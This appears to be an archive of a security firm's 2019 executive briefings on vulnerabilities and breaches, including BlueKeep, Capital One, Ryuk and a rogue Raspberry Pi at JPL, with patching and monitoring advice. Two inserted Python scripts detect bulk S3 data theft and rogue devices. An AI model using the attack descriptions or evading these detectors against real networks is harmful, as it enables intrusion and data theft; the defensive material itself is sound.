
InGuardians Weekly Executive Briefing


Archive

10/1/19 Emergency out-of-cycle patch from Microsoft - must be manually installed

Issue
On Monday, September 23, Microsoft released a rare out-of-band security update to address two vulnerabilities, one in Internet Explorer and one in Windows Defender (CVE-2019-1367 and CVE-2019-1255, respectively).  The US Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) subsequently issued an alert advising all sectors to patch ASAP.

CVE-2019-1367 is a critical flaw in Internet Explorer, versions 9 to 11. The flaw was discovered by Clément Lecigne of the Google Threat Analysis Group. Attackers achieve remote code execution by luring a user to browse a malicious website with a vulnerable browser. The attacker gains the ability to execute code in the context of the user that accessed the malicious web page. Depending on the user’s privilege level, this could allow an attacker to install and run programs, view and modify data, or create new user accounts with full rights and access. Some of these actions may require the user to have privileged access.

CVE-2019-1255 is a less severe flaw which allows for denial of service attacks, triggered by Windows Defender improperly handling files.

Impact
Clément Lecigne discovered CVE-2019-1367 was being actively exploited in the wild.  According to Microsoft’s vulnerability notice, the vulnerability is a memory corruption issue, which permits the attacker to execute code in the context of the current user.

CVE-2019-1255 is a file-handling flaw that an attacker could use to prevent users from executing operating system programs.  This would allow the attacker to render the system dysfunctional.  This flaw is considered less severe because it requires the attacker to already have code running on the target machine.  This flaw has not yet been reported to be exploited in the wild.

Recommendations
InGuardians recommends that Microsoft Windows users download and manually install the patch for CVE-2019-1367. As of the time of this writing, the patch is not yet available through Windows Update, Microsoft Update, or Windows Server Update Services (WSUS) – it must be downloaded and installed manually. Because of the severity of the flaw and its active exploitation in the wild, both Microsoft and DHS urge that this be done ASAP. CVE-2019-1255 will auto-update via the Malware Protection Engine, but users should verify that the update has completed on their systems.

Additional Resources
CVE-2019-1367 | Scripting Engine Memory Corruption Vulnerability (Microsoft)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367

“Nine words to ruin your Monday: Emergency Internet Explorer patch amid in-the-wild attacks”  (The Register)
https://www.theregister.co.uk/2019/09/23/microsoft_internet_explorer_cve_2019_1367/

“DHS Urges Patch for Two Microsoft Out-of-Band Vulnerabilities” (Health IT Security)
https://healthitsecurity.com/news/dhs-urges-patch-for-two-microsoft-out-of-band-vulnerabilities

“Microsoft Releases Out-of-Band Security Updates”  (CISA – National Cyber Awareness System)
https://www.us-cert.gov/ncas/current-activity/2019/09/23/microsoft-releases-out-band-security-updates

9/23/19 New SD Express memory card brings NVMe speed, but PCIe risk

Issue
In 2018, the SD Association ratified v7.0 of its standard, bringing the potential speed of NVMe drives to a new SD card standard by allowing the cards to directly access the computer’s PCIe bus. Called “bus mastering,” this allows the SD card to read and write the computer’s RAM without the permission or intervention of the computer’s CPU. Recently, the first host controller was developed for these cards.

Impact
The standard defines the “SD Express card,” which utilizes the same NVMe technology present in higher-end solid state drives. The highest speed peripheral protocols derive raw speed from communicating directly with a computer or phone’s RAM over a PCIe bus: Firewire cables, Thunderbolt cables and, of course, PCIe cards, including NVMe solid state drives. By eliminating the CPU from the interaction between peripheral and RAM, there’s a decrease in latency and CPU utilization. On the other hand, the CPU can lose the ability to confine the peripheral’s type of interaction with memory.

Lest one believe this is merely theoretical, note that researcher Ulf Frisk has weaponized this functionality with the PCILeech tools. Using either a commodity USB-to-PCIe card or a field-programmable gate array (FPGA), a bad actor who gains access to a computer’s PCIe bus can read and modify the computer’s RAM. Using software like PCILeech, the bad actor can compromise the operating system, modify RAM, or steal data.

No SD Express cards have yet been brought to market, but they’re expected in the next year. These cards could be modified or created to attack a computer, using the same techniques as the current PCILeech-supported devices. There’s increased danger here, as an overwhelming percentage of computers ship with a microSD or SD card slot. These slots are externally and casually accessible to a bad actor.

Recommendations
InGuardians recommends that organizations ensure that policy is already in place to handle the exposure that PCILeech poses: a laptop with a locked screen may not be safe against compromise. If an attacker can reach a PCIe-connected port (SD Express, Thunderbolt, Firewire, or PCIe bus interface), they can read and write to RAM, changing the state of the machine.

InGuardians further recommends that organizations remain vigilant and watch for the release of SD Express cards and of laptops/phones that support this standard. Organizations should develop policies concerning the use of, and protection against, these devices. Particularly sensitive organizations, such as government agencies, should consider physically rendering the ports unusable.

Conducting a security review of all upcoming IT projects is a great way to evaluate the risks that deploying new technology poses to your organization.

Additional Resources

SD and microSD Express Cards 7.1 (SD Association Whitepaper)
https://www.sdcard.org/downloads/pls/latest_whitepapers/SD_and_microSD_Express_Cards_7_1_WhitePaper20190225.pdf

“Phison Develops PS5017 Controller for SD Express MicroSD Express Cards” (Anandtech)
https://www.anandtech.com/show/14551/phison-develops-ps5017-controller-for-sd-express-microsd-express-cards

“Direct Memory Attack the Kernel” (DEF CON 24 talk by Ulf Frisk)
https://www.youtube.com/watch?v=fXthwl6ShOg

“PCIe Injector Gateway – based on Xilinx Artix7 FPGA and FTDI USB FT601 chip” (Firmware Security Blog)
https://firmwaresecurity.com/2017/12/31/pcie_injector-pcie-injector-gateway-based-on-xilinx-artix7-fpga-and-ftdi-usb-ft601-chip/

9/17/19 Local city government defeats ransomware attack.

Issue
Years after both Mirai and WannaCry were successful in exploiting Windows SMB vulnerabilities, systems remain unpatched. The original and derivative malware versions are still using the same flaws and default credentials to gain access, particularly for ransomware attacks. The City of New Bedford, Massachusetts’ IT staff identified the presence of the file-scrambling RYUK nasty. Criminals demanded $5.3 million. The city counter-offered $400,000, based on a budget related to the city’s cyber-insurance policy limits. When the cyber-criminals declined, the city continued negotiating, buying the IT staff the time needed to bolster defenses and restore files from backups. The city paid no ransom and had no interruption in service.

Impact
Derivatives of already successful malware are increasing in effectiveness and in the uses they are put to. They have improved capabilities and altered signatures in order to evade detection. The fact that attackers are still successfully using several-year-old, patchable vulnerabilities reveals the current state of insecurity at many organizations. The failure of companies to patch suggests other gaps in IT security practices and policies.

That is a key distinction: practice vs. policy. Lack of policy will almost ensure that a security function is not done. Having a policy alone does not ensure that it is followed. Specific practices must be devised, be sensible, and be able to be followed without extraordinary or disruptive efforts. Difficult security is too often failed security – it’s not done, done badly, or filled with workarounds and compromise.

The City of New Bedford, Massachusetts found a way to deal with ransomware without paying: shoring up defenses, restoring from backups, and rebuilding systems. “We haven’t seen any interruption in municipal services at all,” said Mayor Mitchell.  This solution undoubtedly cost the city far less than even its negotiating position.

Recommendations
The first thing to learn from New Bedford’s case is that the best way to defeat an attacker is not to let them get access to the system.  A well-governed information security program that includes vulnerability management and remediation needs to be implemented and tested.  Your organization’s IT patch management and policies must be effective at identifying vulnerable systems and deploying patches across an organization in a timely way. Applying patches two to three years after their release is not timely, nor cost-effective.

The second critical lesson is that when an organization is compromised, clean backups of systems, software and data are essential to recovery and business continuity. Yet these backups are only a single component of a full defense-in-depth strategy; all is still lost if the root cause is not discovered, eradicated, and monitored before the restored systems are returned to service.

None of this is new, but evidence shows patching and recovery may not be done as well as one might think. A surge in IoT and SMB attacks has targeted unpatched vulnerabilities in 2019 – this highlights the need for diligence.

Review both policy and practice. Do internal checks to verify the current patch state, and follow a new patch through your process. Review and exercise data recovery plans. This does not need to be large scale; pick a system and do a test restore to a clean system.

Practice, because actual data recovery from an EternalBlue ransomware hack should not be your first rodeo.

Additional Resources
“Massachusetts city tells ransomware scumbags to RYUK off, our IT staff will handle this easily” (The Register)
https://www.theregister.co.uk/2019/09/06/ryuk_bedford_recovery/

“Attack Landscape H1 2019: IoT, SMB traffic abound” (F-Secure Blog)
https://blog.f-secure.com/attack-landscape-h1-2019-iot-smb-traffic-abound/

“Wielding EternalBlue, Hackers Hit Major US Business” (Information Security Media Group)
https://www.bankinfosecurity.com/wielding-eternalblue-hackers-hit-major-us-business-a-11517

9/9/19 Public Metasploit module for BlueKeep released

Issue
There is now a public open source exploit for the BlueKeep vulnerability checked into the Metasploit Framework.  Security researchers have long been concerned about the public release and availability of a stable BlueKeep exploit that would work against all affected versions of Microsoft Windows.  In initial testing, this release isn’t quite as stable and powerful as the exploit tool originally released by the “Shadow Brokers” group, but it is the first step in that direction.  Now that the exploit community has code it can work with, there will be rapid improvements and evolutions of the exploit and of defenses.

What does this mean for the blue teams at companies around the world?  If your vulnerable systems weren’t being compromised by BlueKeep already, ensure that you are at the current patch level and go hunting for malicious activity.  We will also see better signatures for our perimeter defenses, so be on the lookout for new signatures/rules being added and whether they show the exploit being used against your systems.

Impact
The impact of this is twofold: On one side, the release of the exploit module for Metasploit has created an avenue for attackers to more easily attack Windows-based systems.  On the other, Metasploit is also used by blue teams at large organizations to test their defenses, and now they have another arrow in the quiver. InGuardians sees the overall impact of the release of the BlueKeep Metasploit module as a positive, in that while it might mean more systems are compromised in the near term, it will also be used to test and validate that systems are patched at corporations and on large networks.

Recommendations
Patch, run, repeat.  In Microsoft’s Knowledge Base article on the BlueKeep vulnerability and patch, they rate its exploitability on releases older than the current patch level as “1 – Exploitation More Likely”.  In addition to staying current on patch levels, stay up to date on the rules/signatures for your perimeter monitoring and defense systems.  Apply the latest signatures and look for alerts matching BlueKeep activity. It is important to note that exploit activity for BlueKeep may appear identical to vulnerability scanning for the same flaw.  Investigate whether the source of the activity is a valid vulnerability scanner and, if not, treat it as hostile and/or compromised.

Going beyond the simple patch fix, network segmentation down to layer 2 with private VLANs and a network vulnerability management program are both good places to start.

Additional Resources
Microsoft advisory and patch for BlueKeep (note: their site needs to be updated now that there is publicly available exploit code).
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

Ars Technica article on the release of the Metasploit module:
https://arstechnica.com/information-technology/2019/09/exploit-for-wormable-bluekeep-windows-bug-released-into-the-wild/

ZDNET article on the Australian Signals Directorate warning about the public release
https://www.zdnet.com/article/asd-releases-warning-of-bluekeep-vulnerability/

8/5/19 106 Million People Impacted by Capital One Data Breach

Issue
It is alleged that in March of this year, Paige A. Thompson gained access to a number of records belonging to Capital One. The attacker was able to gain access to several of Capital One’s Amazon S3 buckets by abusing a token used by a misconfigured Web Application Firewall (WAF). This provided enough access to enumerate and view information stored in these S3 buckets. After downloading the contents of the S3 buckets (containing several gigabytes of data) the attacker uploaded the stolen information to her personal GitHub page, which was created in her name.

Impact
While 106 million people were affected by this breach, only a small percentage of the victims had bank accounts, Social Security Numbers, or Social Insurance Numbers compromised. The largest portion of the compromised data consisted of credit card application data. This breach highlights the need to review access logs and, in particular, account permissions for data hosted in the cloud.

Recommendations
Performing regular reviews of cloud (in this case, AWS) account permissions will reveal gaps between actual account access and business need. InGuardians also strongly recommends that access logs be reviewed on a continual basis. If Capital One had trended regular account access, the spike in usage from this account could likely have been flagged rather quickly. One final control that could have made a difference in both this and similar incidents would be whitelisting access to the S3 bucket, restricting access to only Capital One’s approved IP address range.

In addition to continued log analysis, behavioral models of account activity, usage, and commands executed over time could have revealed potential compromise. Capital One, as part of their investigation, noted that the initial account access to the WAF should have never had the authority to execute the commands used to gain access to the S3 buckets.  This activity, in particular, is an illustrative example of a significant deviation from normal operation compared to a known baseline,  one that should trigger alerts for further investigation.
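The two controls described above, trending a principal's access against a baseline and restricting a bucket to an approved source range, as an added example (not InGuardians', Capital One's or AWS's own tooling). It assumes a JSON-style export of API events with the fields used below; the role ARN, IP ranges, dates and call counts are all constructed.

```python
"""Baseline-deviation and source-range checks over access-log records.

Added example, not InGuardians', Capital One's or AWS's own tooling. It
assumes a JSON-style export of API events with the fields used below; the
role name, IP ranges, dates and call counts are all constructed.
"""
import ipaddress
import statistics
from collections import Counter, defaultdict

# Constructed stand-in for the organization's approved egress range.
APPROVED_NETS = [ipaddress.ip_network("203.0.113.0/24")]

# Calls that enumerate or read bucket contents; a surge in these is the
# "spike in usage" the briefing says trended access could have flagged.
WATCHED_EVENTS = {"ListBuckets", "ListObjects", "GetObject"}

WAF_ROLE = "arn:aws:iam::111122223333:role/waf-role"  # constructed principal


def build_events():
    """Constructed records: fourteen quiet days, then one day of bulk reads."""
    events = []
    for day in range(1, 15):  # baseline: two object reads a day from inside
        for _ in range(2):
            events.append({"eventTime": f"2019-03-{day:02d}T10:00:00Z",
                           "eventName": "GetObject",
                           "userIdentity": {"arn": WAF_ROLE},
                           "sourceIPAddress": "203.0.113.10"})
    # Day 15: bucket enumeration plus 300 reads from an outside address.
    outside = "198.51.100.77"
    events.append({"eventTime": "2019-03-15T03:12:00Z", "eventName": "ListBuckets",
                   "userIdentity": {"arn": WAF_ROLE}, "sourceIPAddress": outside})
    for i in range(300):
        events.append({"eventTime": f"2019-03-15T03:{13 + i // 60:02d}:{i % 60:02d}Z",
                       "eventName": "GetObject",
                       "userIdentity": {"arn": WAF_ROLE}, "sourceIPAddress": outside})
    return events


def daily_counts(events):
    """Map principal -> Counter of watched calls per calendar day."""
    counts = defaultdict(Counter)
    for ev in events:
        if ev["eventName"] in WATCHED_EVENTS:
            counts[ev["userIdentity"]["arn"]][ev["eventTime"][:10]] += 1
    return counts


def find_spikes(events, baseline_days=14, factor=3.0):
    """Return (principal, day, count) for days whose watched-call count exceeds
    the baseline mean + factor * stdev. A flat baseline has stdev 0, so the
    threshold is floored at twice the mean to avoid alerting on one extra call."""
    findings = []
    for principal, per_day in daily_counts(events).items():
        days = sorted(per_day)
        if len(days) <= baseline_days:
            continue  # not enough history to trend against
        base = [per_day[d] for d in days[:baseline_days]]
        threshold = max(statistics.mean(base) + factor * statistics.pstdev(base),
                        2 * statistics.mean(base))
        for d in days[baseline_days:]:
            if per_day[d] > threshold:
                findings.append((principal, d, per_day[d]))
    return findings


def outside_approved_range(events):
    """Return events whose source address is not in an approved range; with a
    bucket policy restricted to APPROVED_NETS these requests would be denied."""
    return [ev for ev in events
            if not any(ipaddress.ip_address(ev["sourceIPAddress"]) in net
                       for net in APPROVED_NETS)]


if __name__ == "__main__":
    sample = build_events()
    for principal, day, count in find_spikes(sample):
        print(f"SPIKE {day} {principal}: {count} watched calls")
    print(f"{len(outside_approved_range(sample))} requests from outside approved ranges")
```

In the constructed data the WAF role's fifteenth day is flagged by both checks at once, which is the kind of double signal a continual log review should escalate.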

Additional Resources
Capital One Data Theft impacts 106 million people
https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/

Information on the Capital One Cyber Incident
https://www.capitalone.com/facts2019/

USA vs Paige Thompson
https://www.justice.gov/usao-wdwa/press-release/file/1188626/download

7/30/19 University Systems Breached Through Known ERP Vulnerability

Issue
The US Department of Education states that systems at 62 colleges and universities have been compromised through an improper authentication vulnerability in Ellucian Enterprise Resource Planning (ERP) software. In a Technology Security Alert, the Office of Federal Student Aid writes that a vulnerability affecting certain versions of Ellucian Banner Web Tailor and Banner Enterprise Identity Services has been exploited at the schools to create thousands of fake student accounts, some of which have been used to conduct criminal activity. The vulnerability was first detected late last year, and Ellucian developed and released a patch several months ago.

Impact
The flaw was detected in December 2018, and the patch was released in May 2019, which is often a busy time for colleges. Coupling this timing with a CVSSv3 rating of 8.1 (high, but not critical) likely made it harder for campus information security departments to insist that the patch be applied rapidly.  It is likely that this vulnerability has been used to compromise many universities and colleges around the world.  Given that fake accounts from this exploit have already been detected committing crimes, the overall impact will continue to grow in the coming weeks.

Recommendations
InGuardians recommends that institutions of higher education apply patches to any Ellucian ERP systems. Additionally, particularly given Ellucian’s claims that admission portals are being exploited by botnets, InGuardians recommends that institutions add reCAPTCHA capabilities to those portals, which could greatly hinder that activity, particularly with this vulnerability.

In addition to patching and installing reCAPTCHA functionality on your portals, InGuardians recommends verifying valid accounts and checking application logs for signs of compromise.  If you use Ellucian software, now is a good time to be actively hunting your network for signs of compromise, regardless of whether you had patched before this most recent announcement.

Additional Resources
“Ellucian systems compromised at 62 universities, Education Dept. says” (EdScoop)
https://edscoop.com/ellucian-banner-cyberattacks-62-universities/

“Hackers breach 62 US colleges by exploiting ERP vulnerability” (ZDNet)
https://www.zdnet.com/article/hackers-target-62-us-colleges-by-exploiting-erp-vulnerability/

“Over 60 US Colleges Compromised by ERP Exploit” (InfoSecurity Magazine)
https://www.infosecurity-magazine.com/news/over-60-us-colleges-compromised-by/

“Exploitation of Ellucian Banner System Vulnerability” (US Department of Education and Federal Student Aid)
https://ifap.ed.gov/eannouncements/071719ITSecurAlertExploitationEllucianBannerSysVulnerability.html

“Banner Web Tailor and Banner Enterprise Identity Services Vulnerability Disclosure” (Joshua Mulliken)
https://github.com/JoshuaMulliken/CVE-2019-8978

CVE-2019-8978 Detail (NIST)
https://nvd.nist.gov/vuln/detail/CVE-2019-8978

7/1/19 Rogue Raspberry Pi used to steal NASA’s secrets

Issue
NASA’s Office of Inspector General has revealed a nearly year-long compromise by an advanced persistent threat (APT) group of NASA’s Jet Propulsion Lab (JPL). The APT bad actor accomplished this by placing a single-board Raspberry Pi computer onto JPL’s network. Because JPL had little to no segmentation on their network, a single network endpoint was able to steal and exfiltrate valuable and regulated information.

The larger issue at hand is that an insider threat deployed a rogue device on the network and used it to steal sensitive information.

Impact
The bad actor gained access to quite a bit of information, including plans for Mars missions being managed by JPL. Some of the information is illegal to export from the United States under the International Traffic in Arms Regulations (ITAR).

The larger impact is potentially severe, as most organizations are not prepared to identify and isolate a rogue device on their internal networks.

Recommendations
Information security practitioners both inside and outside companies strongly push for network segmentation, which is critical to containing or even avoiding attacks like this one. In the process of building networks, however, companies generally deploy full connectivity from every single computer to every other, whether or not that connectivity is required by the business. For example, in many companies, a publicly accessible machine in the lobby can often reach the machines holding the most valuable intellectual property or controlling the most critical business information.

Private VLANs are one of many options available to aid in network segmentation.  The theory behind this is to create private VLANs on switches for each workstation, and promiscuous private VLANs for the servers.  This allows workstations to communicate with servers, but not with each other.

InGuardians also recommends regular sweeps of networks and office spaces.  During these sweeps, physical and network spaces are actively scanned in an attempt to identify all network-connected devices.  In addition to sweeps, InGuardians recommends using network monitoring tools to identify new machines connected to the network.  Zeek (formerly Bro), arpwatch and many other correlation engines will keep a running log of all new machines that join the network.
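The running log of new machines described above is only useful if someone checks it against the asset inventory. The following is an added example (not InGuardians' or arpwatch's own code) that does that check over constructed arpwatch-style syslog lines; it assumes arpwatch's "new station" and "changed ethernet address" message shapes, and the inventory, addresses and log lines are all constructed.

```python
"""Rogue-device check over constructed arpwatch-style syslog lines.

Added example, not InGuardians' or arpwatch's own code. It assumes the
"new station <ip> <mac> <iface>" and
"changed ethernet address <ip> <new-mac> (<old-mac>) <iface>" message
shapes; the inventory, addresses and log lines are constructed.
"""
import re

# Constructed asset inventory: MACs the organization knows it deployed.
KNOWN_MACS = {
    "00:50:56:aa:bb:01": "file-server-01",
    "3c:52:82:10:20:30": "ws-lobby-kiosk",
}

# Raspberry Pi Foundation OUI prefixes from the public IEEE registry; a hit
# here is worth a look in any network that did not deploy Pis on purpose.
RASPBERRY_PI_OUIS = {"b8:27:eb", "dc:a6:32"}

# arpwatch prints octets without zero padding (e.g. 0:50:56:aa:bb:1), so
# accept one or two hex digits per octet and normalize afterwards.
MAC = r"(?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2}"
NEW_STATION = re.compile(
    rf"arpwatch: new station (?P<ip>[\d.]+) (?P<mac>{MAC}) (?P<iface>\S+)")
CHANGED = re.compile(
    rf"arpwatch: changed ethernet address (?P<ip>[\d.]+) (?P<mac>{MAC}) "
    rf"\((?P<old>{MAC})\) (?P<iface>\S+)")

# Constructed log: two known hosts, an unknown Pi, then a kiosk's IP taken
# over by a different (also Pi-vendor) MAC.
SAMPLE_LOG = """\
Jun 10 09:12:44 sensor arpwatch: new station 10.1.5.23 0:50:56:aa:bb:1 eth0
Jun 10 09:13:02 sensor arpwatch: new station 10.1.5.40 3c:52:82:10:20:30 eth0
Jun 11 02:41:17 sensor arpwatch: new station 10.1.5.77 b8:27:eb:4f:1a:9c eth0
Jun 12 14:05:51 sensor arpwatch: changed ethernet address 10.1.5.40 dc:a6:32:0:11:22 (3c:52:82:10:20:30) eth0
"""


def normalize_mac(mac):
    """Zero-pad each octet so inventory lookups are exact."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))


def vendor_hint(mac):
    """Return a vendor label for OUIs this check cares about, else None."""
    return "raspberry-pi" if mac[:8] in RASPBERRY_PI_OUIS else None


def parse_line(line):
    """Parse one syslog line into a dict, or None if it is not an arpwatch event."""
    for kind, pattern in (("new", NEW_STATION), ("changed", CHANGED)):
        match = pattern.search(line)
        if match:
            event = match.groupdict()
            event["mac"] = normalize_mac(event["mac"])
            if "old" in event:
                event["old"] = normalize_mac(event["old"])
            event["kind"] = kind
            return event
    return None


def audit(log_text, known=KNOWN_MACS):
    """Return (ip, mac, reason) for every event whose MAC is not in inventory."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None or event["mac"] in known:
            continue
        if event["kind"] == "new":
            reason = "unknown device"
        else:  # an inventoried IP now answers from an uninventoried MAC
            owner = known.get(event["old"], "unknown")
            reason = f"address change from {event['old']} ({owner})"
        hint = vendor_hint(event["mac"])
        if hint:
            reason += f", OUI matches {hint}"
        alerts.append((event["ip"], event["mac"], reason))
    return alerts


if __name__ == "__main__":
    for ip, mac, reason in audit(SAMPLE_LOG):
        print(f"ALERT {ip} {mac}: {reason}")
```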

Additional Resources
NASA hacked because of unauthorized Raspberry Pi Connected to its Network (zdnet.com)
https://www.zdnet.com/article/nasa-hacked-because-of-unauthorized-raspberry-pi-connected-to-its-network/

NASA OIG final report on Cyber Security
https://oig.nasa.gov/docs/IG-19-022.pdf

Configuring private VLANS on Cisco Switches
https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/configuration/guide/cli/CLIConfigurationGuide/PrivateVLANs.html

Zeek, formerly bro-ids, network monitoring utility:
https://www.zeek.org/

5/14/19 Microsoft patches serious Remote Desktop Services Vulnerability

Issue
Microsoft released a security update that patches a remote code execution vulnerability in Remote Desktop Services (formerly Terminal Services) on a number of platforms.  The list of affected in-support Windows versions includes: Windows 7, Windows Server 2008 R2, and Windows Server 2008.  The vulnerability is pre-authentication, which led Microsoft to announce that this is a wormable flaw.

Impact
A remote code execution exploit against a service that is often exposed, coupled with the fact that it is pre-authentication, makes the potential severity and impact of this flaw high.

According to Microsoft’s advisory, Windows 8 and Windows 10 users are not affected by this vulnerability.  Due to the severity of the vulnerability Microsoft has issued patches for both Windows XP and Server 2003 which are no longer actively supported.

Recommendations
The top thing you can do is apply the latest updates for your Microsoft systems. Enabling Network Level Authentication (NLA) reduces the risk from an unauthenticated attacker, but still leaves the machine vulnerable.

The patches that fix the Remote Desktop Services vulnerability (CVE-2019-0708) can be found here:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

Microsoft customers that are in-support and have automatic updates turned on should already be patched.  Patch verification through your vulnerability management program is recommended.

Additional Resources
Microsoft Advisory for the Remote Desktop Services vulnerability (CVE-2019-0708):
https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/

Microsoft Security Updates for the Remote Desktop Services vulnerability (CVE-2019-0708):
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

5/1/19 Supply chain attack targets video game developers

Issue
Researchers from Kaspersky and ESET have identified evidence that the same attackers that compromised ASUS with a supply chain attack have also compromised at least three video game companies.  Supply chain attacks target the manufacturers of hardware and software upstream of the final victim company.

In order to compromise ASUS the attackers managed to subvert the ASUS software update service.  Undiscovered for over five months, this allowed attackers to compromise thousands of ASUS customer systems.

In the case of the compromised game companies, attackers targeted Microsoft Visual Studio, uploading malware into the developers’ build environment, ultimately granting the attackers the ability to add their own malicious code to production software.  This in turn gave the attackers the ability to backdoor the games installed on the systems of thousands of unsuspecting customers.

Impact
The impact of the compromised games should be low to medium for our clients.  This is mainly because most businesses do not allow games to be loaded onto their desktops and laptops.  Two of the three game companies have been identified as Electronics Extreme and Zepetto.  Given that these two companies are based in Asia, it is not surprising that the majority of infected systems are located there.  Kaspersky and ESET have said they have identified almost 100,000 infected systems.

The impact of supply chain attacks, however, is immense because this compromised Microsoft Visual Studio.  This should be a reminder for everyone in infosec to re-read “Reflections on Trusting Trust” by Ken Thompson.  Ken described a devastating attack chain that was originally discovered by Paul Karger and Roger Schell in 1974. The attack described the compromise of a binary compiler, so that every program it compiled was malicious.

To wrap up, the impact of successful supply chain attacks is severe.  If the supply chain attack compromises a compiler or an update service, all downstream users will be compromised.

Recommendations
InGuardians recommends conducting a supply chain security analysis.  This will provide your organization with a threat landscape as it concerns the elements of your supply chain.  The difficult aspect of this is that in most cases the downstream companies usually have little visibility into the source code or hardware they purchase.  An important part of the QA & build process should be to ensure that no “additional” functionality or code goes into your end product.

Additionally, this becomes an opportune time to audit and revise B2B and other contract language to include the need for security requirements from suppliers.  This language could include the requirement to conduct and share the results of recent security assessments and code audits under non-disclosure agreements.

Additional Resources
Supply Chain Hackers Snuck Malware Into Videogames (Wired)
https://www.wired.com/story/supply-chain-hackers-videogames-asus-ccleaner/

Hackers Hijacked ASUS Software Updates to Install Backdoors on Thousands of Computers
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers

Reflections on Trusting Trust by Ken Thompson
https://dl.acm.org/citation.cfm?id=358210

Countering “Trusting Trust” by Bruce Schneier
https://www.schneier.com/blog/archives/2006/01/countering_trus.html

InGuardians Events & Resources

Upcoming Webinars
“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

Join Mike Poor as he moderates this roundtable discussion with members of the InGuardians Offensive Services Team.  This webinar will discuss red team penetration test definitions, what clients should be considering when preparing for one, and what to expect to learn from the results.  If you have questions that you would like answered on the webinar, contact us via email (webinars@inguardians.com) or ask us on Twitter (@inguardians).

Register here: https://attendee.gotowebinar.com/register/5144772534233303564

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

Upcoming Classes
ICS410: ICS/SCADA SECURITY ESSENTIALS

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Security West | San Diego | May 9 – May 13 2019

SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019

4/2/19 Critical Flaw in Rockwell Automation Hardware Allows for DoS of Popular ICS Component

Issue
Researchers have discovered a vulnerability in version 5.001 of the software for Rockwell’s PowerFlex 525 drive component.  This drive component is flexible in the number of roles it can perform and sees use in a number of industrial applications, from conveyors to fan and pump controls.  The vulnerability, CVE-2018-19282, was first disclosed to Rockwell by researchers at Applied Risk back in June 2018. It allows an attacker to send a crafted flow of packets that crashes the Common Industrial Protocol (CIP) network stack on the system.  Interestingly, when executed, this attack vector locks out all other connections while allowing the attacker to maintain a connection through which traffic can continue to flow.  The only method to clear the state is a hard power reset of the drive.

An attack of this nature poses a real threat to both the Availability and the Integrity segments of the CIA triad, which lies at the heart of most security designs.  This type of attack is particularly dangerous for ICS systems, which typically place emphasis on the availability portion of the triad, as opposed to conventional IT, which tends to favor confidentiality as the primary segment.

Impact
As with most serious ICS-focused vulnerabilities, this one has the potential to cross from the digital landscape into the kinetic one, by giving the attacker the ability to alter the functioning of the drives and potentially cause physical harm to the systems they ostensibly control.

The ability to change the functioning state of devices designed to govern cooling or air flow to whatever state an attacker desires, coupled with the inability of legitimate operators to connect to the device, increases the risk of the vulnerability.

Fortunately, Rockwell has released a patch for affected software.  However, it should also be noted that other manufacturers also released a number of security advisories over the last week for a range of products.  This is an indication of the increased awareness on their part of the growing threat landscape affecting such systems.

For non-ICS systems, this should serve as another reminder that in today’s growing Internet of Things, there are likely devices attached to your networks that lie somewhere in between conventional IT resources and ICS resources.  Knowing that those devices are present and ensuring that those devices are patched are two challenging pieces of the growing puzzle that is managing modern computing environments.

Recommendations
As the number of attractive ICS targets increases, and as attempts to develop the capability to impact the physical world from compromised digital systems also increase, it becomes increasingly important for organizations to maintain strict discipline with regard to patching systems.  This is especially relevant for ICS systems, which have not always been rigorously patched.

Organizations which use the affected Rockwell systems should patch them immediately, if they have not already done so.

In addition, controlling the flow of TCP and UDP traffic on ports 2222 and 44818 (the key ports used by this Rockwell system) by restricting the sources that can access the devices can help to mitigate the attack vector.

Additional Resources
Advisory
https://applied-risk.com/application/files/4215/5385/2294/Advisory_AR2019004_Rockwell_Powerflex_525_Denial_of_Service.pdf

Rockwell Product Page
https://ab.rockwellautomation.com/Drives/PowerFlex-525

CVE:
https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01

InGuardians Events & Resources
Upcoming Webinars

“SCANNERS, TUNNELS, AND SIMS, OH MY!” with Justin Searle, Director of ICS Security.
April 18, 12 PM PDT / 3 PM EDT

Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.
Register here: https://register.gotowebinar.com/register/8814422277734413068

“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

Join us for a primer on Red Team Penetration Testing.  InGuardians Offensive Services Team will discuss what is a red team pentest, what clients should be considering when preparing one, and what to expect to learn from the results.

Register here: https://attendee.gotowebinar.com/register/5144772534233303564

For all upcoming webinars, please visit: https://www.inguardians.com/webinars/

Upcoming Classes

ICS410: ICS/SCADA SECURITY ESSENTIALS
Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Orlando | Apr 1 – Apr 5 2019

SANS Security West | San Diego | May 9 – May 13 2019

SEC617: WIRELESS PENETRATION TESTING AND ETHICAL HACKING
Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019

SEC560: NETWORK PENETRATION TESTING AND ETHICAL HACKING (MENTOR SESSION)
Instructor: David Mayer, Senior Security Consultant

Boca Raton, FL | Thu May 9 – Fri May 24, 2019

For all upcoming training and events, please visit: https://www.inguardians.com/training/

